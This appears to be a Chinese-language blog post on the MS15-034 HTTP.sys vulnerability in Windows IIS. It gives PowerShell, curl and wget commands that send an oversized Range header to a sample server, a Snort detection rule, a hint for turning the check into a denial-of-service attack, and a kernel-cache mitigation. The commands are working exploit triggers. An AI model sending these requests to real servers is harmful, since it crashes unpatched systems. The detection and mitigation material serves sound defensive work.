Windows IIS 的 HTTP.sys 漏洞可能造成 DOS 或遠端執行碼攻擊

所有 Windows 平台上有用 HTTP.sys 皆有可能被攻擊到掛，DOS 攻擊要生效需要伺服器上有大檔案存在(>4GB) 比較有可能

檢查方式

powershell -com {$wr=[Net.WebRequest]::Create( 'http://10.10.10.171/iisstart.htm');$wr.AddRange('bytes' ,0,18446744073709551615);$wr.GetResponse();$wr.close()}

curl -v 10.10.10.171/ -H "Host: test" -H "Range: bytes=1-18446744073709551615"

wget -O /dev/null --header="Range: 0-18446744073709551615" http://10.10.10.171/

用 SNORT 防護方式

alert tcp $EXTERNL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)

(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)

DOS 攻擊方式

這 "0-" ~ "20-" 中間值作切換

IIS7 可以停用核心快取來防範這個漏洞

參考 : MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution. PATCH NOW

Windows IIS 的 HTTP.sys 漏洞可能造成 DOS 或遠端執行碼攻擊

Related posts 相關文章

CVE-2023-44487 HTTP/2 協定漏洞史上最大 DDoS 攻擊

Cloudflare 在 2023 年第一季的 DDOS 報告

SessionManager 是一個躲藏在正常管道的 IIS 後門

IIS APPCMD 回收應用程式集區 POOL

作者

留言

撰寫回覆或留言取消回覆

Windows IIS 的 HTTP.sys 漏洞可能造成 DOS 或 遠端執行碼攻擊

Related posts 相關文章

CVE-2023-44487 HTTP/2 協定漏洞史上最大 DDoS 攻擊

Cloudflare 在 2023 年第一季的 DDOS 報告

SessionManager 是一個躲藏在正常管道的 IIS 後門

IIS APPCMD 回收應用程式集區 POOL

作者

留言

撰寫回覆或留言 取消回覆

Windows IIS 的 HTTP.sys 漏洞可能造成 DOS 或遠端執行碼攻擊

撰寫回覆或留言取消回覆